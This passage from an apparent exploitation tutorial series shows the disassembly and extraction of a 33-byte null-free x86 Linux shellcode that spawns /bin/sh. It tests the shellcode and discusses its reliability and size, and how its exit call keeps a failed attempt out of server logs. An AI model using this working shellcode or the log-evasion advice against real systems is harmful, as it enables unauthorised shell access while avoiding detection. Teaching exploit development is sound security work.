rev_eng_series/roughwork$ objdump -Mintel -d shell32_no_null shell32_no_null: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor eax,eax 8048062: 50 push eax 8048063: 68 2f 2f 73 68 push 0x68732f2f 8048068: 68 2f 62 69 6e push 0x6e69622f 804806d: 89 e3 mov ebx,esp 804806f: 50 push eax 8048070: 53 push ebx 8048071: 89 e1 mov ecx,esp 8048073: 31 d2 xor edx,edx 8048075: b0 0b mov al,0xb 8048077: cd 80 int 0x80 08048079 <exit>: 8048079: 31 c0 xor eax,eax 804807b: b0 01 mov al,0x1 804807d: 31 db xor ebx,ebx 804807f: cd 80 int 0x80
-
Extract shellcode and store it in exploit.txt.
rev_eng_series/roughwork$ python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80'" > exploit.txt
-
-
Test our shellcode using code2_32 program.
rev_eng_series/roughwork$ cat exploit.txt - | ./code2_32 whoami adwi who adwi tty7 Nov 26 17:51 (:0) clear TERM environment variable not set.
- Awesome! You now have working, no-null byte shellcode with you.
With this, we have successfully written shellcode for x86-Linux systems.
A few things about shellcode
There are different parameters to measure how good the shellcode is. Let us take a look at them.
-
Reliable Shellcode : When you inject shellcode into a process, it is not always guaranteed that it will get executed successfully. We know why we removed the NULL characters. We removed it because a few input-taking functions, string functions consider NULL-byte as the end of string. strcpy, gets are 2 examples. read is a function which will take in the number of bytes specified. We need our shellcode to work under all of these conditions - this is being more reliable.
- In this post, we just saw how to write shellcode, we still haven’t injected it into a real buffer overflow. A few problems arise with Buffer Overflow. There, we will use different set of techniques to make the complete exploit more reliable.
-
Length of shellcode : Bottom line is, your shellcode should be able to work under strict memory conditions. Our shellcode is correctly 33 bytes - 25 bytes for execve and 8 bytes for exit. If the buffer is say 30 bytes, we can remove the exit part and keep only the core-execve part. So, our shellcode without exit part will work with buffer size >= 25.
-
Stealthier exploit: This means, how well the exploit is hiding from the Security Measures taken to protect that machine. Suppose it’s a machine running a Web Server, it would have a lot of measures taken. In such machines, every activity is logged. Every Segmentation Fault is logged, every user login attempt is logged and more.
-
Suppose we are exploiting some other program in the same server. If we inject shellcode without the exit part, we might end up getting caught because in case the shellcode fails, it segfaults and it will be logged. So, the exit is helping us to keep away from the watching eyes.
-
This is probably not helping the exploit to be stealthier. In case our exploit fails, we will probably get one more chance to try out something else.
-
So, a lot was done in this post. We started with exit shellcode, then understood what execve is, how it helps us in getting a shell. Then we wrote C program, assembly programs to get shellcode. Finally, we wrote no-null byte shellcode, pretty small in length(33 bytes) and we were successful in getting a shell.
In the next post, we will see how to write what is known as reverse-shellcode, shellcode to exploit vulnerable programs on remote systems.
That is it for now.
Thank you!
Go to next post: Exploitation using Code Injection - Part3
Go to previous post: Exploitation using Code Injection - Part1